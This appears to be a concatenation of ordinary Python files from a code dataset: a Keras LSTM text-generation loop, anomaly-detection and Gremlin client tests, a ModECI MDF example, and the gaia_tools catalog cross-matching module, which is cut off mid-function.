# NOTE: `text`, `chars`, `char_indices`, `maxlen`, `x` and `y` are assumed to be
# prepared by an earlier text-vectorization step that is not shown in this file.

# Single-layer LSTM model for next-character prediction
model = keras.models.Sequential()
model.add(layers.LSTM(128, input_shape=(maxlen, len(chars))))
model.add(layers.Dense(len(chars), activation='softmax'))
# Model compilation configuration
optimizer = keras.optimizers.RMSprop(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=optimizer)
# Function to sample the next character given the model’s predictions
def sample(preds, temperature=1.0):
preds = np.asarray(preds).astype('float64')
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
    probas = np.random.multinomial(1, preds, 1)
return np.argmax(probas)
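# Illustration (added; not part of the original script): how temperature reshapes
# a probability distribution before sampling. The numbers are made up.
#
#   preds = np.array([0.5, 0.3, 0.2])
#   for t in (0.2, 1.0, 1.5):
#       scaled = np.exp(np.log(preds) / t)
#       print(t, scaled / scaled.sum())
#
# Low temperature (0.2) sharpens the distribution towards the most likely
# character; high temperature (1.5) flattens it, producing more surprising text.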
# Text-generation loop
import sys
import random
# Trains the model for 60 epochs
for epoch in range(1, 60):
print(f'Epoch: {epoch}')
model.fit(x, y, batch_size=128, epochs=1)
# Selects a text seed at random
start_index = random.randint(0, len(text) - maxlen - 1)
generated_text = text[start_index: start_index + maxlen]
print(f'--- Generating with seed: {generated_text} ---')
# Tries a range of different sampling temperatures
for temperature in [0.2, 0.5, 1.0, 1.2]:
print(f'--- Temperature {temperature} ---')
sys.stdout.write(generated_text)
# Generates 400 characters, starting from the seed text
for i in range(400):
sampled = np.zeros((1, maxlen, len(chars)))
for t, char in enumerate(generated_text):
sampled[0, t, char_indices[char]] = 1.
# Samples the next character
preds = model.predict(sampled, verbose=0)[0]
next_index = sample(preds, temperature)
next_char = chars[next_index]
generated_text += next_char
generated_text = generated_text[1:]
sys.stdout.write(next_char)
| 3.28125 | 3 |
tests/test_structure_learning.py | thunderbug1/pyanom | 0 | 1240 | <gh_stars>0
import io
import unittest
import numpy as np
class TestGraphicalLasso(unittest.TestCase):
"""Basic test cases."""
def _getTarget(self):
from pyanom.structure_learning import GraphicalLasso
return GraphicalLasso
def _makeOne(self, *args, **kwargs):
return self._getTarget()(*args, **kwargs)
@classmethod
def setUpClass(self):
self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244],
[-0.460992487, -1.304668238, -0.599247488],
[-0.503171745, -1.308368748, -1.451411048],
[-0.904446243, -0.287837582, 0.197153592],
[-1.106120624, 0.243612535, 1.051237763],
[0.371920628, 1.690566027, -0.468645532],
[-0.861682655, 1.472544046, -0.846863556],
[0.632918214, 1.35895507, -1.217528827],
[0.017011646, 1.556247275, -0.149119024],
[-1.129336215, 0.486811944, 0.012272206],
[0.498967152, -0.530065628, -2.14011938],
[0.402460108, -0.474465633, -0.041584595],
[-0.847994655, -1.281269721, -0.430338406],
[-0.583857254, 0.228815073, -1.321443286],
[0.963425438, -1.136873938, 0.990406269],
[-1.342349795, -0.147133485, 1.286410605],
[-0.546153552, 0.134343445, -0.380672316],
[-2.264867999, 0.227795362, 1.477762968],
[0.070095074, -0.770899782, 2.100831522],
[0.425213005, 0.796156033, 1.676164975]])
self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828],
[-0.708547003, -0.572139833, 0.858932219],
[-1.125947228, -1.049026454, 0.35980022],
[0.653070988, -0.052417831, 0.787284547],
[-1.059131881, 1.621161051, -1.295306533],
[0.499065038, -1.064179225, 1.243325767],
[0.452740621, -0.737171777, 0.352807563],
[0.626897927, -1.100559392, -0.905560876],
[1.338835274, 2.083549348, -1.280796042],
[0.264928015, 10, 2.544472412],
[-0.754827534, -1.031919195, 1.227285333],
[-0.774019674, 0.241245625, -0.989132941],
[1.298381426, 0.19445334, 2.267355363],
[1.46892843, 1.24946146, 0.322341667],
[1.057265661, -0.846614104, -0.355396321],
[0.810670486, -0.719804484, -0.943762163],
[1.169028226, 0.492444331, 0.234015505],
[-0.307091024, -1.56195639, 0.509095939],
[0.849156845, 0.533674261, 0.069183014],
[0.102812565, 8, 1.545239732]])
def test_outlier_analysis_score_shape(self):
target = self._makeOne()
target.fit(self.X_normal)
pred = target.outlier_analysis_score(self.X_error)
self.assertEqual(pred.shape, (20, 3))
def test_incorrect_feature_size(self):
X_normal = np.array([-0.056523959,
- 0.881470896,
-0.249935965,
0.186624902,
-0.30183287,
2.000815584,
0.710538188,
0.591089702,
0.099804538,
0.114730483]).reshape(-1, 1)
X_error = np.array([0.660985506,
-1.450512173,
-1.27733756,
-1.420294211,
0.737179562,
1.481425898,
-0.170147132,
-1.527687346,
0.580282631,
-3.722489636]).reshape(-1, 1)
target = self._makeOne()
with self.assertRaises(ValueError):
target.fit(X_normal)
def test_anomaly_analysis_score_shape(self):
target = self._makeOne()
target.fit(self.X_normal)
pred, pmatrix = target.anomaly_analysis_score(self.X_error)
self.assertEqual(pred.shape, (3, ))
self.assertEqual(pmatrix.shape, (3, 3))
if __name__ == '__main__':
unittest.main()
| 2.453125 | 2 |
examples/MDF/states.py | 29riyasaxena/MDF | 12 | 1241 | """
Example of ModECI MDF - Testing state variables
"""
from modeci_mdf.mdf import *
import sys
def main():
mod = Model(id="States")
mod_graph = Graph(id="state_example")
mod.graphs.append(mod_graph)
## Counter node
counter_node = Node(id="counter_node")
p1 = Parameter(id="increment", value=1)
counter_node.parameters.append(p1)
p2 = Parameter(id="count", value="count + increment")
counter_node.parameters.append(p2)
op1 = OutputPort(id="out_port", value=p2.id)
counter_node.output_ports.append(op1)
mod_graph.nodes.append(counter_node)
## Sine node...
sine_node = Node(id="sine_node")
sine_node.parameters.append(Parameter(id="amp", value=3))
sine_node.parameters.append(Parameter(id="period", value=0.4))
s1 = Parameter(
id="level", default_initial_value=0, time_derivative="6.283185 * rate / period"
)
sine_node.parameters.append(s1)
s2 = Parameter(
id="rate",
default_initial_value=1,
time_derivative="-1 * 6.283185 * level / period",
)
sine_node.parameters.append(s2)
op1 = OutputPort(id="out_port", value="amp * level")
sine_node.output_ports.append(op1)
mod_graph.nodes.append(sine_node)
new_file = mod.to_json_file("%s.json" % mod.id)
new_file = mod.to_yaml_file("%s.yaml" % mod.id)
if "-run" in sys.argv:
verbose = True
# verbose = False
from modeci_mdf.utils import load_mdf, print_summary
from modeci_mdf.execution_engine import EvaluableGraph
eg = EvaluableGraph(mod_graph, verbose)
dt = 0.01
duration = 2
t = 0
recorded = {}
times = []
s = []
while t <= duration:
times.append(t)
print("====== Evaluating at t = %s ======" % (t))
if t == 0:
eg.evaluate() # replace with initialize?
else:
eg.evaluate(time_increment=dt)
s.append(eg.enodes["sine_node"].evaluable_outputs["out_port"].curr_value)
t += dt
if "-nogui" not in sys.argv:
import matplotlib.pyplot as plt
plt.plot(times, s)
plt.show()
if "-graph" in sys.argv:
mod.to_graph_image(
engine="dot",
output_format="png",
view_on_render=False,
level=3,
filename_root="states",
only_warn_on_fail=True, # Makes sure test of this doesn't fail on Windows on GitHub Actions
)
return mod_graph
if __name__ == "__main__":
main()
| 2.359375 | 2 |
gremlin-python/src/main/jython/tests/driver/test_client.py | jseekamp/tinkerpop | 1 | 1242 | <filename>gremlin-python/src/main/jython/tests/driver/test_client.py
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import pytest
from gremlin_python.driver.protocol import GremlinServerError
from gremlin_python.driver.client import Client
from gremlin_python.driver.request import RequestMessage
from gremlin_python.process.strategies import OptionsStrategy
from gremlin_python.process.graph_traversal import __
from gremlin_python.structure.graph import Graph
__author__ = '<NAME> (<EMAIL>)'
def test_connection(connection):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
results_set = connection.write(message).result()
future = results_set.all()
results = future.result()
assert len(results) == 6
assert isinstance(results, list)
assert results_set.done.done()
assert 'host' in results_set.status_attributes
def test_client_simple_eval(client):
assert client.submit('1 + 1').all().result()[0] == 2
def test_client_simple_eval_bindings(client):
assert client.submit('x + x', {'x': 2}).all().result()[0] == 4
def test_client_eval_traversal(client):
assert len(client.submit('g.V()').all().result()) == 6
def test_client_error(client):
try:
# should fire an exception
client.submit('1/0').all().result()
assert False
except GremlinServerError as ex:
assert 'exceptions' in ex.status_attributes
assert 'stackTrace' in ex.status_attributes
def test_client_connection_pool_after_error(client):
# Overwrite fixture with pool_size=1 client
client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1)
try:
# should fire an exception
client.submit('1/0').all().result()
assert False
except GremlinServerError as gse:
# expecting the pool size to be 1 again after query returned
assert gse.status_code == 597
assert client.available_pool_size == 1
def test_client_bytecode(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
assert len(result_set.all().result()) == 6
def test_client_bytecode_options(client):
# smoke test to validate serialization of OptionsStrategy. no way to really validate this from an integration
# test perspective because there's no way to access the internals of the strategy via bytecode
g = Graph().traversal()
t = g.withStrategies(OptionsStrategy(options={"x": "test", "y": True})).V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
assert len(result_set.all().result()) == 6
##
t = g.with_("x", "test").with_("y", True).V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
assert len(result_set.all().result()) == 6
def test_iterate_result_set(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 6
def test_client_async(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
future = client.submitAsync(message)
result_set = future.result()
assert len(result_set.all().result()) == 6
def test_connection_share(client):
# Overwrite fixture with pool_size=1 client
client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1)
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
future = client.submitAsync(message)
future2 = client.submitAsync(message2)
result_set2 = future2.result()
assert len(result_set2.all().result()) == 6
# This future has to finish for the second to yield result - pool_size=1
assert future.done()
result_set = future.result()
assert len(result_set.all().result()) == 6
def test_multi_conn_pool(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1)
future = client.submitAsync(message)
future2 = client.submitAsync(message2)
result_set2 = future2.result()
assert len(result_set2.all().result()) == 6
# with connection pool `future` may or may not be done here
result_set = future.result()
assert len(result_set.all().result()) == 6
def test_big_result_set(client):
g = Graph().traversal()
t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1
t = g.V().limit(10)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10
t = g.V().limit(100)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 100
t = g.V().limit(1000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1000
t = g.V().limit(10000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10000
def test_big_result_set_secure(secure_client):
g = Graph().traversal()
t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1
t = g.V().limit(10)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10
t = g.V().limit(100)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 100
t = g.V().limit(1000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1000
t = g.V().limit(10000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10000
| 2.015625 | 2 |
gaia_tools/xmatch/__init__.py | henrysky/gaia_tools | 44 | 1243 | <reponame>henrysky/gaia_tools
# Tools for cross-matching catalogs
import csv
import sys
import os
import os.path
import platform
import shutil
import subprocess
import tempfile
import warnings
WIN32= platform.system() == 'Windows'
import numpy
import astropy.coordinates as acoords
from astropy.table import Table
from astropy import units as u
from ..load.download import _ERASESTR
def xmatch(cat1,cat2,maxdist=2,
colRA1='RA',colDec1='DEC',epoch1=None,
colRA2='RA',colDec2='DEC',epoch2=None,
colpmRA2='pmra',colpmDec2='pmdec',
swap=False,
col_field=None):
"""
NAME:
xmatch
PURPOSE:
cross-match two catalogs (incl. proper motion in cat2 if epochs are different)
INPUT:
cat1 - First catalog
cat2 - Second catalog
maxdist= (2) maximum distance in arcsec
colRA1= ('RA') name of the tag in cat1 with the right ascension in degree in cat1 (assumed to be ICRS)
colDec1= ('DEC') name of the tag in cat1 with the declination in degree in cat1 (assumed to be ICRS)
epoch1= (2000.) epoch of the coordinates in cat1
colRA2= ('RA') name of the tag in cat2 with the right ascension in degree in cat2 (assumed to be ICRS)
colDec2= ('DEC') name of the tag in cat2 with the declination in degree in cat2 (assumed to be ICRS)
epoch2= (2000.) epoch of the coordinates in cat2
colpmRA2= ('pmra') name of the tag in cat2 with the proper motion in right ascension in degree in cat2 (assumed to be ICRS; includes cos(Dec)) [only used when epochs are different]
colpmDec2= ('pmdec') name of the tag in cat2 with the proper motion in declination in degree in cat2 (assumed to be ICRS) [only used when epochs are different]
       swap= (False) if False, find closest matches in cat2 for each cat1 source; if True, do the opposite (important when one of the catalogs has duplicates)
col_field= (None) if None, simply cross-match on RA and Dec; if a string, then cross-match on RA and Dec with additional matching in the data tag specified by the string
OUTPUT:
(index into cat1 of matching objects,
index into cat2 of matching objects,
angular separation between matching objects)
HISTORY:
2016-09-12 - Written - Bovy (UofT)
2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)
2019-07-07 - add additional catalog field matching - Leung (UofT)
"""
if epoch1 is None:
if 'ref_epoch' in cat1.dtype.fields:
epoch1= cat1['ref_epoch']
else:
epoch1= 2000.
if epoch2 is None:
if 'ref_epoch' in cat2.dtype.fields:
epoch2= cat2['ref_epoch']
else:
epoch2= 2000.
_check_epoch(cat1,epoch1)
_check_epoch(cat2,epoch2)
depoch= epoch2-epoch1
if numpy.any(depoch != 0.):
# Use proper motion to get both catalogs at the same time
dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\
/3600000.*depoch
ddec= cat2[colpmDec2]/3600000.*depoch
# Don't shift objects with non-existing proper motion
dra[numpy.isnan(cat2[colpmRA2])]= 0.
ddec[numpy.isnan(cat2[colpmDec2])]= 0.
else:
dra= 0.
ddec= 0.
mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1],
unit=(u.degree, u.degree),frame='icrs')
mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec,
unit=(u.degree, u.degree),frame='icrs')
if col_field is not None:
try: # check if the field actually exists in both cat1/cat2
cat1[col_field]
cat2[col_field]
except KeyError: # python 2/3 format string
            raise KeyError("'%s' does not exist in both catalogs" % col_field)
uniques = numpy.unique(cat1[col_field])
        if swap: # initialize distances to minus one so that untouched indices can be spotted and filtered out at the end
d2d = numpy.ones(len(cat2)) * -1.
idx = numpy.zeros(len(cat2), dtype=int)
else:
d2d = numpy.ones(len(cat1)) * -1.
idx = numpy.zeros(len(cat1), dtype=int)
for unique in uniques: # loop over the class
idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique]
idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique]
if idx_1.shape[0] == 0 or idx_2.shape[0] == 0: # the case where a class only exists in one but not the other
continue
if swap:
temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1])
m1 = numpy.arange(len(cat2))
idx[cat2[col_field] == unique] = idx_1[temp_idx]
d2d[cat2[col_field] == unique] = temp_d2d
else:
temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2])
m1 = numpy.arange(len(cat1))
idx[cat1[col_field] == unique] = idx_2[temp_idx]
d2d[cat1[col_field] == unique] = temp_d2d
        d2d = d2d * temp_d2d.unit # make sure d2d ends up with a unit so that the "<" comparison below works
else:
if swap:
idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)
m1= numpy.arange(len(cat2))
else:
idx,d2d,d3d = mc1.match_to_catalog_sky(mc2)
m1= numpy.arange(len(cat1))
# to make sure filtering out all neg ones which are untouched
mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d))
m1= m1[mindx]
m2= idx[mindx]
if swap:
return (m2,m1,d2d[mindx])
else:
return (m1,m2,d2d[mindx])
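# Minimal usage sketch for xmatch (illustrative only; ``cat1``/``cat2`` are
# hypothetical record arrays with the column names shown below, they are not
# part of this module):
#
#   from gaia_tools import xmatch
#   m1, m2, sep = xmatch.xmatch(cat1, cat2, maxdist=2,
#                               colRA1='RA', colDec1='DEC',
#                               colRA2='ra', colDec2='dec', epoch2=2015.5)
#   matched1, matched2 = cat1[m1], cat2[m2]  # sep is the angular separation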
def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC',
selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec',
savefilename=None,gaia_all_columns=False):
"""
NAME:
cds
PURPOSE:
Cross-match against a catalog in the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface
INPUT:
cat - a catalog to cross match, requires 'RA' and 'DEC' keywords (see below)
xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in a format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2')
maxdist= (2) maximum distance in arcsec
colRA= ('RA') name of the tag in cat with the right ascension
colDec= ('DEC') name of the tag in cat with the declination
selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
epoch= (2000.) epoch of the coordinates in cat
colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
gaia_all_columns= (False) set to True if you are matching against Gaia DR2 and want *all* columns returned; this runs a query at the Gaia Archive, which may or may not work...
savefilename= (None) if set, save the output from CDS to this path; can match back using cds_matchback
OUTPUT:
(xcat entries for those that match,
indices into cat of matching sources: index[0] is cat index of xcat[0])
HISTORY:
2016-09-12 - Written based on RC catalog code - Bovy (UofT)
2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)
2018-05-08 - Added gaia_all_columns - Bovy (UofT)
"""
if epoch is None:
if 'ref_epoch' in cat.dtype.fields:
epoch= cat['ref_epoch']
else:
epoch= 2000.
_check_epoch(cat,epoch)
depoch= epoch-2000.
if numpy.any(depoch != 0.):
# Use proper motion to get both catalogs at the same time
dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
/3600000.*depoch
ddec= cat[colpmDec]/3600000.*depoch
# Don't shift objects with non-existing proper motion
dra[numpy.isnan(cat[colpmRA])]= 0.
ddec[numpy.isnan(cat[colpmDec])]= 0.
else:
dra= numpy.zeros(len(cat))
ddec= numpy.zeros(len(cat))
if selection != 'all': selection= 'best'
if selection == 'all':
raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
# Write positions
posfilename= tempfile.mktemp('.csv',dir=os.getcwd())
resultfilename= tempfile.mktemp('.csv',dir=os.getcwd())
with open(posfilename,'w') as csvfile:
wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)
wr.writerow(['RA','DEC'])
for ii in range(len(cat)):
            wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360.,
                         cat[ii][colDec]-ddec[ii]])
_cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat)
# Directly match on input RA
ma= cds_load(resultfilename)
if gaia_all_columns:
from astroquery.gaia import Gaia
# Write another temporary file with the XML output of the cross-match
tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T,
names=('source_id','RA','DEC'),
dtype=('int64','float64','float64'))
xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd())
tab.write(xmlfilename,format='votable')
#get the data release....
table_identifier = xcat.split('/')[-1]
if table_identifier == 'gaia2':
table_identifier = 'gaiadr2'
try:
job= Gaia.launch_job_async(
"""select g.*, m.RA as mRA, m.DEC as mDEC
from %s.gaia_source as g
inner join tap_upload.my_table as m on m.source_id = g.source_id""" % table_identifier,
upload_resource=xmlfilename,
upload_table_name="my_table")
ma= job.get_results()
except:
print("gaia_tools.xmath.cds failed to retrieve all gaia columns, returning just the default returned by the CDS xMatch instead...")
else:
ma.rename_column('mra','RA')
ma.rename_column('mdec','DEC')
finally:
os.remove(xmlfilename)
# Remove temporary files
os.remove(posfilename)
if savefilename is None:
os.remove(resultfilename)
else:
shutil.move(resultfilename,savefilename)
# Match back to the original catalog
mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch,
colpmRA=colpmRA,colpmDec=colpmDec)
return (ma,mai)
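# Illustrative sketch of the intended CDS workflow (``cat`` is a hypothetical
# input catalog with 'RA'/'DEC' columns; not part of this module):
#
#   gaia, idx = cds(cat, xcat='vizier:I/350/gaiaedr3', maxdist=2)
#   # gaia[i] is the CDS cross-match for cat[idx[i]], as computed by cds_matchback below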
def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat,
nruns_necessary=1):
"""CDS xMatch (sometimes?) fails for large matches, because of a time-out,
so we recursively split until the batches are small enough to not fail"""
# Figure out which of the hierarchy we are running
try:
runs= ''.join([str(int(r)-1)
for r in posfilename.split('csv.')[-1].split('.')])
except ValueError:
runs= ''
nruns= 2**len(runs)
if nruns >= nruns_necessary:
# Only run this level's match if we don't already know that we should
# be using smaller batches
_cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat)
try:
ma= cds_load(resultfilename)
except ValueError: # Assume this is the time-out failure
pass
else:
return nruns
# xMatch failed because of time-out, split
posfilename1= posfilename+'.1'
posfilename2= posfilename+'.2'
resultfilename1= resultfilename+'.1'
resultfilename2= resultfilename+'.2'
# Figure out which of the hierarchy we are running
runs= ''.join([str(int(r)-1)
for r in posfilename1.split('csv.')[-1].split('.')])
nruns= 2**len(runs)
thisrun1= 1+int(runs,2)
thisrun2= 1+int(''.join([str(int(r)-1)
for r in posfilename2.split('csv.')[-1].split('.')]),2)
# Count the number of objects
with open(posfilename,'r') as posfile:
num_lines= sum(1 for line in posfile)
# Write the header line
with open(posfilename1,'w') as posfile1:
with open(posfilename,'r') as posfile:
posfile1.write(posfile.readline())
with open(posfilename2,'w') as posfile2:
with open(posfilename,'r') as posfile:
posfile2.write(posfile.readline())
# Cut in half
cnt= 0
with open(posfilename,'r') as posfile:
with open(posfilename1,'a') as posfile1:
with open(posfilename2,'a') as posfile2:
for line in posfile:
if cnt == 0:
cnt+= 1
continue
if cnt < num_lines//2:
posfile1.write(line)
cnt+= 1 # Can stop counting once this if is done
else:
posfile2.write(line)
# Run each
sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
.format(thisrun1,nruns))
sys.stdout.flush()
nruns_necessary= _cds_match_batched(resultfilename1,posfilename1,
maxdist,selection,xcat,
nruns_necessary=nruns_necessary)
sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
.format(thisrun2,nruns))
sys.stdout.flush()
nruns_necessary= _cds_match_batched(resultfilename2,posfilename2,
maxdist,selection,xcat,
nruns_necessary=nruns_necessary)
sys.stdout.write('\r'+_ERASESTR+'\r')
sys.stdout.flush()
# Combine results
with open(resultfilename,'w') as resultfile:
with open(resultfilename1,'r') as resultfile1:
for line in resultfile1:
resultfile.write(line)
with open(resultfilename2,'r') as resultfile2:
for line in resultfile2:
if line[0] == 'a': continue
resultfile.write(line)
# Remove intermediate files
os.remove(posfilename1)
os.remove(posfilename2)
os.remove(resultfilename1)
os.remove(resultfilename2)
return nruns_necessary
def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat):
# Send to CDS for matching
result= open(resultfilename,'w')
try:
subprocess.check_call(['curl',
'-X','POST',
'-F','request=xmatch',
'-F','distMaxArcsec=%i' % maxdist,
'-F','selection=%s' % selection,
'-F','RESPONSEFORMAT=csv',
'-F','cat1=@%s' % os.path.basename(posfilename),
'-F','colRA1=RA',
'-F','colDec1=DEC',
'-F','cat2=%s' % xcat,
'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'],
stdout=result)
except subprocess.CalledProcessError:
os.remove(posfilename)
if os.path.exists(resultfilename):
result.close()
os.remove(resultfilename)
result.close()
return None
def cds_load(filename):
if WIN32:
        # Windows does not have float128, but source_id needs more precision than a double.
        # Get around this by reading source_id as an integer, since source_id is always an integer anyway:
        # first read a single row as fp64 just to get the column names, then read again with source_id as uint64 to keep its precision.
data = numpy.genfromtxt(filename, delimiter=',', skip_header=0,
filling_values=-9999.99, names=True, max_rows=1,
dtype='float64') # only read the first row max to reduce workload to just get the column name
to_list = list(data.dtype.names)
# construct a list where everything is fp64 except 'source_id' being int64
dtype_list = [('{}'.format(i), numpy.float64) for i in to_list]
dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64)
return numpy.genfromtxt(filename, delimiter=',', skip_header=0,
filling_values=-9999.99, names=True,
dtype=dtype_list)
else:
return numpy.genfromtxt(filename, delimiter=',', skip_header=0,
filling_values=-9999.99, names=True,
dtype='float128')
def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best',
epoch=None,colpmRA='pmra',colpmDec='pmdec',):
"""
NAME:
cds_matchback
PURPOSE:
Match a matched catalog from xmatch.cds back to the original catalog
INPUT
cat - original catalog
xcat - matched catalog returned by xmatch.cds
colRA= ('RA') name of the tag in cat with the right ascension
colDec= ('DEC') name of the tag in cat with the declination
selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
epoch= (2000.) epoch of the coordinates in cat
colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
OUTPUT:
Array indices into cat of xcat entries: index[0] is cat index of xcat[0]
HISTORY:
2016-09-12 - Written - Bovy (UofT)
2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)
"""
if selection != 'all': selection= 'best'
if selection == 'all':
raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
if epoch is None:
if 'ref_epoch' in cat.dtype.fields:
epoch= cat['ref_epoch']
else:
epoch= 2000.
_check_epoch(cat,epoch)
depoch= epoch-2000.
if numpy.any(depoch != 0.):
# Use proper motion to get both catalogs at the same time
dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
/3600000.*depoch
ddec= cat[colpmDec]/3600000.*depoch
# Don't shift objects with non-existing proper motion
dra[numpy.isnan(cat[colpmRA])]= 0.
ddec[numpy.isnan(cat[colpmDec])]= 0.
else:
dra= numpy.zeros(len(cat))
ddec= numpy.zeros(len(cat))
# xmatch to v. small diff., because match is against *original* coords,
# not matched coords in CDS
mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec,
unit=(u.degree, u.degree),frame='icrs')
mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'],
unit=(u.degree, u.degree),frame='icrs')
idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)
